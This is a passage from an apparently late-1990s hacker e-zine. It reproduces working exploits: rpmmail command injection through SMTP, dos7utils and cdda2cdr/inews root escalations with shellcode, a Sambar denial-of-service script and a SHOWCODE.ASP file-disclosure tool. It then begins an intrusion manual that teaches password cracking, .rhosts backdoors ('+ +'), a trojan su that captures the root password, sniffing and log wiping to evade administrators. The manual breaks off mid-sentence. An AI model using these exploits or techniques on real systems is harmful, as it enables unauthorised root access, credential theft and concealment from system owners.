/etc/SuSE-release;uname -a;id SuSE Linux 6.2 (i386) VERSION = 6.2 Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown uid=100(xnec) gid=100(users) groups=100(users) bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah Could not open config file! sh: Y: not found uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users) Could not open acknowledge file! bash-2.03$ The remote exploit is merely: bash-2.03$ telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500 (CDT) MAIL FROM: ;/command/to/execute; 250 <;/command/to/execute;> ... Sender Okay RCPT TO: rpmmail 250 ... Recipient Okay data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit A remote scan of vulnerable hosts for this problem would be simple as well, since EXPN can be used to verify the existence of the .forward file: 220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:38:44 -0500 (CDT) EXPN rpmmail 250 "| /home/rpmmail/rpmmail -c /home/rpmmail/rpmmail.conf" Brock Tellier UNIX Systems Administrator ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1 @HWA 63.0 A vulnerability exists in the /usr/lib/merge/dos7utils program ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greetings, A vulnerability exists in the /usr/lib/merge/dos7utils program (suid root by default) which allows any user to execute any command as root. The dos7utils program gets its localeset.sh exec path from the environment variable STATICMERGE. By setting this to a directory writable by us and setting the -f switch, we can have dos7utils run our program as follows: bash-2.02$ uname -a; id; pwd UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5 uid=101(xnec) gid=1(other) /usr/lib/merge bash-2.02$ export STATICMERGE=/tmp bash-2.02$ cat > /tmp/localeset.sh #!/bin/sh id bash-2.02$ chmod 700 /tmp/localeset.sh bash-2.02$ ./dos7utils -f bah uid=0(root) gid=1(other) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp) bash-2.02$ ---- Searching through the securityfocus vulnerability archives yields 0 matches for search string "unixware", but several for "openserver". I thought this was rather strange, considering that SCO is discontinuing OpenServer after 5.0.5 in favor of the much more reliable (though not security-wise, evidently) UnixWare 7. And so begins my audit of the virgin Unixware 7 so soon after my incomplete audit of SCO 5.0.5. Brock Tellier UNIX Systems Administrator ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1 @HWA 64.0 Sambar HTTP-Server DoS attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ While testing the security of the Sambar HTTP-Server I found it vulnerable to a simple DOS attack. Sending a "GET XXXX(...a lot of Xs..)XXXX HTTP/1.0" crashes the Server. It will die WITHOUT logging the attack. My testing-environment: Sambar 4.2.1 M$IE 5.0 (de) Windows 95 C (de) Sample exploit code follows. Dennis Conrad (dennis@linuxstart.com) -------------------- #!/usr/bin/perl ######### # Sample DOS against the Sambar HTTP-Server # This was tested against Sambar 4.2.1 running on Windows95 C # This attack will NOT be logged! Only use it to determine if # your Server is vulnerable! # # Dennis Conrad (dennis@linuxstart.com) # use IO::Socket; print "+++++++++\n"; print "+ Simple DOS-attack against the Sambar HTTP-Server (tested 4.2.1)\n"; print "+ Found on the 3rd of October 1999 by dennis\@linuxstart.com\n\n"; if ($#ARGV != 0) { die "+ Please give the host address as argument\n" } opensocket ("\n"); print $remote "GET " . "X" x 99999999999999999999 . " HTTP/1.0\n\n"; close $remote; opensocket ("\n+ The server seemed to be vulnerable to this attack\n"); close $remote; die "+ The server does not seem to be vulnerable to this attack\n"; sub opensocket { $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $ARGV[0], PeerPort => "http(80)", ) || die "+ Can't open http-port on $ARGV[0]$_[0]"; $remote->autoflush(1) } # EOF -------------------------- Do you do Linux? :) Get your FREE @linuxstart.com email address at: http://www.linuxstart.com @HWA 65.0 There is a buffer overflow vulnerability in cdda2cdr ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greetings, There is a buffer overflow vulnerability in cdda2cdr distributed with (at least) package cdwtools-0.93-78. This program is sgid disk by default and thus any malicious user who gains disk privs will have r/w access to your entire hard drive(s) in the form of /dev/hd*. This is obviously a quick root compromise. Fixed packages will be available soon from various vendors (probably by the time you read this). Note that this particular overflow does not affect cdda2wav. Brock Tellier UNIX Systems Administrator --- cdda2x.sh --- #! /bin/sh # # Shell script for Linux x86 cdda2cdr exploit # Brock Tellier btellier@usa.net # cat > /tmp/cdda2x.c < ** ** Brock Tellier btellier@usa.net **/ #include #include char exec[]= /* Generic Linux x86 running our /tmp program */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/cd"; #define LEN 500 #define NOP 0x90 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } void main(int argc, char *argv[]) { int offset=0; int i; int buflen = LEN; long int addr; char buf[LEN]; if(argc > 3) { fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else if (argc == 2){ offset=atoi(argv[1]); } else if (argc == 3) { offset=atoi(argv[1]); buflen=atoi(argv[2]); } else { offset=500; buflen=500; } addr=get_sp(); fprintf(stderr, "Linux x86 cdda2cdr local disk exploit\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n"); fprintf(stderr, "Using addr: 0x%x\n", addr+offset); memset(buf,NOP,buflen); memcpy(buf+(buflen/2),exec,strlen(exec)); for(i=((buflen/2) + strlen(exec))+1;i /tmp/cd.c < pretty hard to guess huhuhu.. */ #include #include #include #include #define DEFAULT_OFFSET 0 #define BUFFER_SIZE 540 #define RET 0xbffff6f0 main (int argc, char *argv[]) { FILE *fp; int offset = 0; char *buff = NULL; int i; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; if (argc > 1) offset = atoi (argv[1]); buff = malloc (1024); if (!buff) { printf ("malloc isnt working\n"); exit (0); } memset (buff, 0x90, BUFFER_SIZE); for (i = 100; i < BUFFER_SIZE - 4; i += 4) *(long *) &buff[i] = RET + offset; memcpy (buff + (100 - strlen (execshell)), execshell, strlen (execshell)); if ((fp = fopen ("filez", "w")) != NULL) { fprintf (fp, "From: %s\nSubject: y0\nNewsgroups: yaya le chat\n\n\n\n\n", buff); fclose (fp); execl ("/usr/bin/inews", "inews", "-h", "filez", NULL); } else { printf ("Couldnt open file : filez\n"); exit (0); } } @HWA 67.0 Shows any file from any NT Server, if it has the SHOWCODE.ASP script. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* showfile * Obocaman / OiOiO's Band, 1999 * * Basado en un programa original de weld@l0pht.com * * Este programa muestra cualquier fichero de un servidor NT que tenga * el script SHOWCODE.ASP * * This program shows any file from any NT Server, if it has the * SHOWCODE.ASP script. * * ATENCION: No compilar con la opción -O2 !!!!!! * CAUTION: Don't compile with -O2 option!!!!! * * Uso: ./showfile server/s file * file must be relative to \ in the server. * fichero debe ser relativo al \ del servidor. * * Para ver los mensajes en castellano compilar con * -D_SPANISH_ * * Released under GPL. */ #include #include #include #include #include #include #include int sock; int comprueba(char *host) { struct sockaddr_in sin; struct hostent *hp; hp = gethostbyname(host); if (hp==NULL) { #ifdef _SPANISH_ fprintf(stderr,"Host desconocido: %s\n\n",host); #else fprintf(stderr,"Unknown host: %s\n\n",host); #endif return 0; } memset((char*) &sin,0, sizeof(sin)); memcpy((char *) &sin.sin_addr,hp->h_addr,hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(80); sock = socket(AF_INET, SOCK_STREAM, 0); if((connect(sock,(struct sockaddr *) &sin, sizeof(sin))) < 0) { #ifdef _SPANISH_ fprintf(stderr,"Hubo un error en la conexión con el host %s.\n",host); #else fprintf(stderr,"Can't connect with %s.\n",host); #endif return 0; } return 1; } void main(int argc, char *argv[]) { char total[16384]; char *ok=NULL; char *buffer; char *estado; char *test="GET /msadc/Samples/SELECTOR/showcode.asp"; char *path="?source=/msadc/Samples/../../../../../"; char *http=" HTTP/1.0\n\n"; int i; fprintf(stderr,"\nshowfile, by Obocaman / OiOiO's Band. 1999\n"); if (argc <= 2) { #ifdef _SPANISH_ printf("Uso: %s \n", argv[0]); #else printf("Usage: %s \n", argv[0]); #endif exit(1); } for(i=1;i0) printf("%s",buffer); } else { #ifdef _SPANISH_ fprintf(stderr,"Mal rollo, el servidor %s no tiene el showcode.asp\n",argv[i]); #else fprintf(stderr,"Bad news, server %s hasn't showcode.asp...\n",argv[i]); #endif } printf("\n"); free(buffer); free(estado); close(sock); } } } @HWA 68.0 The Hack kit (root kit) ~~~~~~~~~~~~~~~~~~~~~~~ From http://blacksun.box.sk THIS PAPER CONTAINS .C CODE - MAKE SURE TO TURN WORD WRAP OFF! In your editor!! AND DO NOT SAVE ANY CHANGES TO THIS FILE IF ASKED.... Unix Utils Linux/BSD/SySV/SunOS/IRIX/AIX/HP-UX Hacking Kit v1.0.c Jan/97 Hacking Kit v2.0.b March/97 (this is an update) By: Invisible Evil IRC: #unixhacking #virus #hackers #virii #hacking #hacker #hack is just to busy for me ;) NICK: i-e If you have any other exploits, bugs, sniffers or utils that are not in here please mail them to ii@dormroom.pyro.net. And I will be sure to keep you updated with the latest version of this toolkit. Comments are welcome. Sys admin's that want to keep their system clean are welcome to request the latest version. If you are looking for perfect grammar or spelling please put this file in your circular file. I put enough time into this and just put it through a cheap spell check. Whats new? Look for more info on tricks of the trade, and nfs mounting drives to gain access to shells. I am sure you will like the additions. I have added a login trojan, in.telnetd trojan, and some more scripts for scanning machines for mountable drives. Have pun! I will add a (*) to u p d a t e d s e c t i o n s. Contents: Disclaimer Preface Chapter I - Unix commands you need to know 1A. Basic commands Getting back to your home directory getting into a user home directory easy how to see what directory you are in now How to get a complete manual for each command 1B. Telnet Unix file permissions Unix groups How to change permissions and groups 1C. Rlogin .rhosts How to setup a .rhost file to login without a password 1D. FTP Logging in to the site, but never out of the site. Using prompt, hash, and, bin Using get, put, mget, and, mput 1E. GCC (unix compiler) How to get the file to the hack box without uploading it How to copy files to your home directory easy How to compile .c programs How to name them what you want How to load programs in the background while you log off Looking at your process with ps Chapter II - Getting started (your first account) 2A. Cracking password files How to get hundreds of accounts with your first hacked account Why you only really need one password cracked on a system How to get the root password from the admin, on an non-exploit system Using A fake su program Doc's for the fake su program How to find the admin's How to read .bash_history Cracker Jack - A good password cracker How to use crackerjack Word Files What you will need to get started Hashing the word files * Hash file for use with cracker jack and your word list * Hash file for use with cracker jack and your passwd file 2B. Talking to newbe's How to find the newbe's How to get the newbe's passwords 2C. The hard way Using finger @ What could the password be? Getting more info from finger a small .c file to use if you get on Writing a small perl script to do the work for you. How to get a domain list of all domains from rs.internic.net A perl script to rip the domains & put them in a sorted readable list How to execute the perl script * 2D. Using mount to gain access to unix systems * What is nfs mount * What you need to get started * How to check a system to see if you can mount their drives * A script to scan for systems that are nfs mountable * How to mount the system * How to unmount the system * A Live Demo * Mounting the drive * Viewing the user directories * Editing the local machine's passwd file * How to put a .rhosts file in one on thier users directories * How to rlogin to the users account Chapter III - Getting password files 3A. PHF What is phf Using lynx or netscape to access phf Finding the user id the victims httpd (www) is running under How to see if you are root using phf How to cat the password file using phf Backing up the victims password file Changing a users password using phf Restoring the old passwords A .c file that will let you pipe commands to phf from your shell How to use the phf shell file Another way to use phf - text by quantum Quantum's bindwarez file A perl script that will try EVERY domain on the internet and log root access and snatch passwd files for you all day in the background. Doc's for the pearl script above Getting accounts from /var/?/messages A script to get the passwords for you if you can access /var/?/messages 3B. Newbe's Lammer's 3C. Getting shadow passwd files What is a shadow passwd Getting the shadow file without root access A .c file to cat any file without root access 3D. Getting /etc/hosts Why get /etc/hosts Chapter IV - Getting the root account What to do if you can't get root on the system 4A. Bugs Intro 4B. Exploits The umount/mount exploit What are SUID perm's The umount .c file How to compile umount.c The lpr Linux exploit The lpr Linux .c exploit file The lpr BSD .c exploit file How to use lpr Watch the group owners with lpr Just use lpr for first root, then make a SUID shell How to make the SUID root shell for future root access (root root) The splitvt exploit The splitvt exploit .c program How to use the splitvt exploit program The sendmail 8.73 - 8.83 root exploit shell script How to use the sendmail exploit to get root access Chapter V - Making yourself invisible Keeping access 5A. Zap2 (for wtmp/lastlog/utmp) Fingering the host before login How to login and stay safe How to configure Zap2 Finding the log file locations The zap.c file 5B. Other scripts The wted wtmp editor Command line usage for wted How to chmod the wtmp.tmp file How to copy the wtmp.tmp to the wtmp file Setting the path for the wtmp file in wted The wted.c file Cleaning the lastlog file using lled Command line options for lled How to use lled How to chmod the lastlog.tmp file How to copy the lastlog.tmp file to lastlog Setting the path for the lastlog file in lled The lled.c file * A good perl script for editing wtmp, utmp, and, checking processes Chapter VI - Cleaning the log files 6A. A walk around in a hacked system - let's login Logging on the system Watching for admin's Nested directories Having your root file ready Becoming invisible Greping the log directory Cleaning the logs Lets sniff the network Editing your linsniffer.c Looking at the processes running Compiling and naming your sniffer program Starting a sniff session Changing group file access Making a suid root shell trojan for uid=0 gid=0 every time Naming your trojan Touching the files date Checking the sniffer log file Setting the history files to null * Using unset for the history files 6B. messages and the syslog How to find the logs are by reading /etc/syslog.conf How to see if there are logs in hidden directories How to see if logs are being mailed to user accounts How to see if logs are going to another machine * How to edit syslog.conf to hide logins * Restarting syslogd How to see if there is a secret su log by reading /etc/login.defs 6C. The xferlog How to edit the xferlog How to grep and edit the www logs How to look for ftp logs * Other ways to edit text logs * Using grep -v * A script to rip text lines from these logs * Restarting syslogd 6D. The crontabs How to find and read the root or admin's cron How to see if MD5 is setup on the machine What is MD5 Chapter VII - Keeping access to the machine 7A. Tricks of the trade When the system admin has found you out What to expect from the admin History files Nested directories Placing trojans Hidden directories Making new commands (trojans) Adding or changing passwd file entry's Setting some admin accounts with null passwords The best way to add an account Editing a null account so you can login Installing more games or exploitable programs How to know your admin's Reading system mail (with out updating pointers) What to look for in the mail directories A program to read mail without updating pointers 7B. Root kits and trojans What are root kits What are Demon kits What do trojans do ********************************************************* * Appendix I - Things to do after access * ********************************************************* The a-z checklist ********************************************************* * Appendix II - Hacking / Security WWW / ftp sites * ********************************************************* ********************************************************* * Appendix III - More exploits for root or other access * ********************************************************* A3-01. Vixie crontab buffer overflow for RedHat Linux A3-02. Root dip exploit A3-03. ldt - text by quantumg A3-04. suid perl - text by quantumg A3-05. Abuse Sendmail 8.6.9 A3-06. ttysurf - grab someone's tty A3-07. shadow.c - Get shadow passwd files A3-08. Abuse Root Exploit (linux game program) A3-09. Doom (game) root exploit - makes suid root shell A3-10. dosmenu suid root exploit A3-11. Doom root killmouse exploit A3-12. Root exploit for resize icons A3-13. Root console exploit for restorefont A3-14. Root rxvt X server exploit A3-15. Root wuftpd exploit A3-16. A shell script called gimme, used to read any system file ********************************************************* * Appendix IV - Other UNIX system utilities * ********************************************************* A4-01. Cloak v1.0 Wipes your presence on SCO, BSD, Ultrix, and HP/UX UNIX A4-02. invisible.c Makes you invisible, and works on some SunOS without root A4-03. SySV Program that makes you invisible A4-04. UNIX Port scanner A4-05. Remove wtmp entries by tty number or username A4-06. SunOS wtmp editor A4-07. SunOS 4+ Zap your self from wtmp, utmp and lastlog ********************************************************* * Appendix V - Other Unix Exploits * ********************************************************* A5-01. HP-UX Root vhe_u_mnt exploit A5-02. IRIX Root mail exploit A5-03. Root cron grabber - Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX A5-04. IRIX mail exploit to make you any user on the machine - BUT NOT root A5-05. BSD - crontab root exploit ********************************************************* * Appendix VI - UUENCODED FILES * ********************************************************* 1. Quantum's Bindwarez binary file for PHF 2. Demon Root Kit - Includes: Banish, DemonPing, DemonSu, DemonTelnet 3. Linux Root Kit - Includes: Login, Netstat, and, PS 4. The Fake SU Program ********** Disclaimer ********** True this manual will aid hackers into breaking into systems but it is also provided to guide system admin's on different security problems and help with things to watch for on their system to keep hackers off. If you use this manual to gain access to any system where you do not belong, and do any type of damage, you alone will suffer for your stupid actions! I am not telling you to break into any system, I am just showing some of my experience, and things that I would do if I was to break into my own system. This is for information only..... ISP's Secure Your Systems! ******* Preface ******* Ok, lets get started. If you are going to hack, you must be doing this for a reason. All hackers have their reasons for doing what they do. Most are just hungry to learn. Most of what I have learned about unix, i have learned on some service providers or someone else's machine. I am one for the 'hands on' experience. There is much to learn and you would have to read 20,000 books just to get what you would learn out of a few config files, a few admin email messages, some .bash_history files, and some poking around a few systems. Here in this manual you should learn how to be the 'complete hacker' and come up with a style of your own. It will not take to long, but it will take some practice and experience before you will be able to call yourself a hacker. Not just anyone that can crack a password file, and log into a unix machine can call themselves a hacker. Ok, you can get root access to a box! You still are not a hacker! You need to know why you are a hacker first, and then have your 'code' and 'style'. You need a purpose and a reason for hacking into any box. The true hacker knows why he is doing what he does, and is doing it for reasons like knowledge, free information, and ACCESS. The true hacker will turn one hack into access to many different systems and providers and keep this access for future learning and more FREE information. The wan-a-be hacker will not be invisible, and will do many stupid things like: delete or corrupt data, down the machine, run bots or irc clients from root accounts or machines Give the passwords he cracked to everyone in the world to prove they can hack. Or they might just do stupid things that will get themselves cought. I think sometimes this is done purposely just to draw attention to themselves so they can get cought and make the announcement that they are a hacker, and they were here! A real hacker needs no such glory, he just needs the access and wants to keep it and be invisible! He will not tell many friends about the system, he will not give out the passwords or accounts, he will keep others off so he can continue his access there and keep it clean. Here in this manual i hope that i can add enough style so that you can have real heart in this matter and and be a good clean hacker. Happy hacking ... -------------------------------- Chapter I Unix commands you need to know. -------------------------------- There are just a few basic commands you need to learn, and then some unix programs that will aid you in logging in logging into or keeping access to the machine. Call your local internet service provider and ask them to sell you a shell account so that you will have something to practice on to learn these basic commands. The average shell account might cost you $10.00 per month if you don't already get one with your existing account. -------------- Section 1A Basic commands -------------- I hope you have a basic knowledge of DOS, that would help a bit, and I will assume that you already do in writing this manual. DOS Commands you are used to first: REMEMBER: unix is case sensitive, so if I here use lower case you must also, if I use a space you must also. DOS will let you get away with allot of things but unix will not! DIR/W = ls DIR = ls -l DIR/AH = ls -al AH=(hidden) -al=(include hidden files as well as regular) RENAME = mv ATTRIB = chmod MD = mkdir RD = rmdir DEL = rm COPY = cp These are the basic commands, i suggest that you lookup the man pages on each one of these commands from your unix shell. You would do this by typing 'man command' without the ''. each one of these commands will have switches for them, like cp -R to copy files and directories. So you would type man cp to get all of the switches you can use with the copy command. cd {then press enter} will always take you to your home directory cp filename $HOME will copy the file to your home directory cd ~username will take you to that users home dir if you have access to be there pwd {press enter} will show you what directory you are in. ------------- Section 1B Telnet ------------- Telnet is a command that you can use from a shell account, or from an exe file (telnet.exe) from Windows, OS/2, Windows 95 and other operating systems that will let you connect to another machine on the net. There are other programs you will learn about here like FTP, and rlogin that you can use as well but now we will use telnet. You can use telnet if you know the IP address or the host name you want to connect or login to. To use the command you would just use the telnet program to connect to the IP or host like this: Telnet netcom.com or telnet 206.146.43.56 Ok, now lets login: telnet machine.com trying ..... Connected to machine.com Linux 2.0.28 (machine.com) (ttyp0) machine login:username password:####### bash$ Your prompt might look different, but we will use this one. Notice above that it will tell you the O/S when you get the login prompt. You can use this if you get a large collection of passwd files. Even before going on to crack them sort them by O/S types by just telnet-ing to them to see what they are running. There are other ways, but lets keep this telnet topic going for a sec... telnet domain.name.com, after you see what they are running make a note of this and ctrl ] to break out of the connection. Put all of your linux passwd files into a pile to be cracked first. All we need is one account that works for the system, and we can be almost sure we will have root on that machine! There are way to many holes in linux to think we will not be able to own one of those machines, so lets get to work so we can start this wonderful world of hacking. ---------------------- Unix File Permissions ---------------------- bash$ bash$ cd /tmp bash$ ls -l total 783 -rwx------ 1 wood users 1 Jan 25 18:28 19067haa -rw-r--r-- 1 berry mail 1 Jan 16 12:38 filter.14428 -rw------- 1 rhey19 root 395447 Jan 24 02:59 pop3a13598 -rw------- 1 rhey19 root 395447 Jan 24 03:00 pop3a13600 drwxr-xr-x 4 root root 1024 Jan 12 13:18 screens First notice that we used a / and not \ to change to the tmp directory! Unix uses the / as the root so it is backwards from DOS here. Notice we did ls -l for the long directory. If we did 'ls' we would have what you see below. bash$ ls 19067haa filter.14428 pop3a13598 pop3a13600 screens With what we see here can not tell much, so most of the time we will be using ls -al with the -al we will see the hidden files also, hidden files and directories will always start with a '.'. Now watch: bash$ ls -al total 794 drwxrwxrwt 4 root root 8192 Jan 25 23:05 . drwxr-xr-x 22 root root 1024 Dec 28 18:07 .. -rw-r--r-- 1 berry users 6 Jan 25 23:05 .pinetemp.000 drwxr-xr-x 2 berry users 1024 Jan 25 23:05 .test -rwx------ 1 wood users 1 Jan 25 18:28 19067haa -rw-r--r-- 1 berry mail 1 Jan 16 12:38 filter.14428 -rw------- 1 rhey19 root 395447 Jan 24 02:59 pop3a13598 -rw------- 1 rhey19 root 395447 Jan 24 03:00 pop3a13600 drwxr-xr-x 4 root root 1024 Jan 12 13:18 screens .pinetemp.000 is a hidden file, and .test is a hidden directory. -rw-r--r-- 1 berry mail 1 Jan 16 12:38 filter.14428 row 1 row2 row3 ---------------------------- Now here we need to learn about permissions, users, and groups. Row #1 is the file permissions Row #2 is who owns the file Row #3 is the group owner of the file File permissions are grouped together into three different groups. If the line starts with a d, it is a directory, if there is no d, it is a file. - --- --- --- | | | |--------> Other = anyone on the machine can access | | |------------> Group = certain groups can access | |----------------> User = only the owner can access |------------------> Directory Mark - rw- r-- r-- | | | |--------> Other can only read the file | | |------------> Group can only read the file | |----------------> User can read or write to the file |------------------> It is not a directory - rwx rwx r-x | | | |--------> Other can read and execute the file | | |------------> Group can read write and execute the file | |----------------> User can read write and execute the file |------------------> It is not a directory The owner is the user name in row #2 and the group owner is the name in row #3. In DOS the file has to have a .exe, .com, or .bat extension to execute, but in unix all you need is the --x in your group of user, other, group You can change these permissions if you own the file or have root access: --------------------------------------------------------------------------- chmod oug+r filename will make all three groups of permissions be able to read the file. chmod og-r filename would make the file readable only to the user that owns the file. (notice the - or + to set the file yes or no) chmod +x filename would make the file execute by all. chown username filename would make the file owned by another user. chgrp groupname filename would make the file owned by another group. --------------------------------------------------------------------------- Make sure to keep file perm's and groups the same or you will be sniffed out and booted from the system. Changing configs on the system might only break other functions, so keep your paws off or you are just asking to get cought. Only do what you are *SURE* of. Only use commands that you know, you might find yourself spending hours fixing just one typo like chown -R username /* could keep you busy for a year ;) Just be careful! We will get into this stuff more as we go into the needs for this. ------------------ Section 1C Rlogin ------------------ There is another command you might use and we will get into this elsewhere as we get into using rlogin to login to a system without a password. For now read the man pages on rlogin by using the man rlogin from your shell account. The basic command would be : rlogin -l username hostname connecting.... password: bash$ Rlogin requires the user to have a file in their home directory that tells what system they can receive the rlogin from. In this file .rhosts it would look like this: username hostname (or) hostname if you were to add to this file + + it would let any user from any host login without a password. The file would look like this: ----- cut here ------ + + _____ cut here ------ if they already had entry's you could add the + + under their host names, but remember now they would notice seeing they would now be able to rlogin without the password. You would be targeting people that did not already have a .rhosts file. --------------- Section 1D FTP --------------- Another way to login will be FTP. You can use a windows client, or just login from a shell. ftp ftp.domain.com This will allow you to download or upload files to the site you are hacking. Just make sure to edit the xferlog (see section 6d) to wipe your tracks on the system. Remember NEVER to ftp or telnet out of the hacked system, only log into it! If you are coming from your own system, or from another hacked account you might just be giving your login and password to the system admin or another hacker on their system. There could be a telnetd or ftpd trojan loaded on the system, or even a sniffer. Now you would have just gave someone your login id and password. And if this was the system admin, he might have the idea that revenge is sweet ;) Using ftp from the shell, I would suggest using a few commands: After you login, and have your prompt, type these commands pressing enter after each one. prompt hash bin prompt will allow you to type a command like (mget *) or (mput*) and transfer an entire directory without having it prompt you for each file yes or no. hash marks hash will put ############ on the screen so you can see the transfer is still moving and at what speed. bin will make sure you get the files in the right mode, and if transferring binary files, you will be sure they will uncompresses. The transfer commands are easy, get filename, or, put filename, or for many files you can use regular wild cards with mput or mget. -------------------- Section 1E GCC compiler -------------------- There will be a time when you will need to compile a .c file. It is best to compile on the machine you are working on. So upload or copy and past the files to the hacked box and compile them there. If you have problems with their compiler you can try to upload pre-compiled files. One way to get the file up to the victims machine would be to use copy and paste. Get a good tsr or windows shareware program to do this if you do not have any way to do it now. You can copy a script file from one window and paste it into an editor on the victims machine, and then compile the new file. Walaa... no upload log of the file. You can copy and paste from the victims machine as well so that there are no download logs of ascii files. To copy and paste you can just open an editor on the hacked box, and then copy from your other session, and paste your script into the editor and save the file. This way there will not be anything in the xferlog yet. You can do the same thing with the password file. If you do decide to download the password file using ftp, make sure to copy it to your home directory first under a different name. bash:/etc:> cp passwd $HOME/plog would copy the file called passwd from the /etc directory you were in, to your home directory in a file called plog instead of passwd. Admin's grep the xfer logs looking for who is downloading the passwd file. Another way to get file to or from the box without showing up in the logs would be to open an irc session on the victims machine, then from your other session where you are already a user on irc, send the files using dcc. The command to send the files would be /dcc send The command to get the file on the other side would be /dcc get It would be nice if you had a bot loaded on the irc when you were hacking so that you could just send files to the bot and have it auto receive them. A 'bot' is a robot program that you can load in the background on your shell account that will receive files, keep channels open, etc... The GCC compiler is easy... gcc filename.c -o filenameyouwant If i was to compile a file called z2.c that would zap the log files i would type this: gcc z2.c -o zap This would give me a file that would exe, called zap If I just typed : gcc z2.c I would have a file named a.out, that was the executable file and would have to rename it to zap, or some name i would know by doing this: mv a.out zap Now I would have a file named zap that was executable instead of a.out. You will want to make sure you are not naming these files names that sys admin's will know. If you had a sniffer file called 'linuxsniffer.c' you don't want to keep the same name ;) call it something like: gcc linuxsniffer.c -o lsn Remember also sometimes you can execute these files names right in the directory by just typing the file name like for our 'lsn' (sniffer) above just by typing lsn. But sometimes this will not work unless you add a ./ to the command. So remember, sometimes you will need to type ./lsn or your file name. Also there will be a time you will want a program to run in the background even after you logoff. Like in the case of the sniffer above. In this case you might want to name your sniffer something that would not be so easy noticed. Use your own style here. BUT to make it stay in the background while you are off the system you need to run the command with a & after the command. lsn& If you were to just type lsn, your screen would pause, and you would not be able to type while the program was sniffing, but if you typed lsn& it would load and the system prompt would come right back to you. Also the system would let you know it was loaded by giving you the process id # that it was loaded as. You could view the process with the ps -x command, you might want to run ps -auxe |more a= all u= show user x= yours e= env some machines f=tree or command: pstree ------------------------------------ Chapter II Getting started (your first account) ------------------------------------ There are many ways to get a starter account. I will go into each area to help you get started. All you need is one good account to spawn off to hundreds of accounts. Think of this; You get one good exploitable system, most any linux machine ;) Now you get root access and load a sniffer program. The TCP sniffer will search out any login process on the network and log the login and password for any telnet, ftp, or dial-in session going out or coming into the system. Now even if it is a small ethernet connection you have around 100 passwords for a few machines or domains. If a larger net provider you have hundreds of accounts all over the world! All you need for this is one good account and password to an exploitable system. If it seems you can not exploit root on the system, this might be a good system to crack passwords on and exchange the accounts for other accounts from hackers or irc users that are looking to load a bot but do nt have the shell account or disk space to do it. NEVER give out even one password to a system you exploited root on. Keep these systems to yourself! Lets now get into ways to get your first accounts. ------------------------ Section 2A. Cracking passwd files ------------------------ If you are hacking with the right frame of mind, you will run the crack program until you get one good account that will let you into the system. You will login and see if you can exploit root on the system, if so, get root, get the files you need to use into your nested directory, and erase your presence, and clean all of the logs. Now you are ready to load your sniffer. Why go on hacking passwords for a system that within 24 hours you will have most of the passwords anyway? Not only for the machine you just hacked, but other machines that were connected to as well. If the system is not exploitable don't even waste your time on it, go on to the next. At a latter date if you want to crack passwords for accounts to trade go ahead. If you get an admin's account cracked you might want to read his history files, and see if he is using the su command to access root allot. If he is you can use an su trojan on him. This will get you the root password. This works like this: You change his shell script so that a hidden directory (.term) is good, is set in the search path before all other directories. You put a fake su binary in the .term (or other) directory. He types su, everything looks good to him, he types in the root password when prompted, the password id copied to a log file in /tmp/.elm69, and deletes the trojan su file, and returns to him a password error telling him to try again. He thinks he must have done something wrong and runs su again, but this time the real one and logs in. You will find this fake su program in the last appendix named uuencoded files. Here are the docs: Fake SU by Nfin8 - i-e IRC: /msg i-e Easy as 1,2,3 ... 1. Change the path in one of the user accounts that you have access to that you see is using SU from reading their history files, to hit a path first that you have placed the su trojan file into. .term or .elm is good! 2. Make sure to edit the top of the su.c file to the path you will be using so that the sutrojan will delete isself and let the real SU work for the second try. 3. Put all of the files in the target directory and compile the su.c file. gcc su.c -o su Then delete all of the files but the su. All done! .bash_profile might look like this: # .bash_profile # Get the aliases and functions if [ -f ~/.bashrc ]; then . ~/.bashrc fi # User specific environment and startup programs PATH=$PATH:$HOME/bin ENV=$HOME/.bashrc USERNAME="" export USERNAME ENV PATH You change the first line to: PATH=$HOME/.term:$PATH:$HOME/bin When the sys admin run's 'SU' it will run the SU-trojan in the .term directory first and report that the password he typed was wrong, the Trojan su program would have put a hidden file in the /tmp directory for you that contains the root password (or account passwd) typed. If it was an account rather then the root password it will let you know the account name. Then the trojan su program deletes itself so that the next try will get the real su program. You can find the admin's at the top section of the passwd file in the /etc directory. Just type : more passwd You can be sure that the first two real accounts made in the passwd file are admin's, also sometimes you can find others by where their directories are located in the password file. Like /staff/username. The history files are in each users account directory. You can read these to see what the last commands were that were typed by the user. Sometimes as much as the last 100+ commands. Look for the file 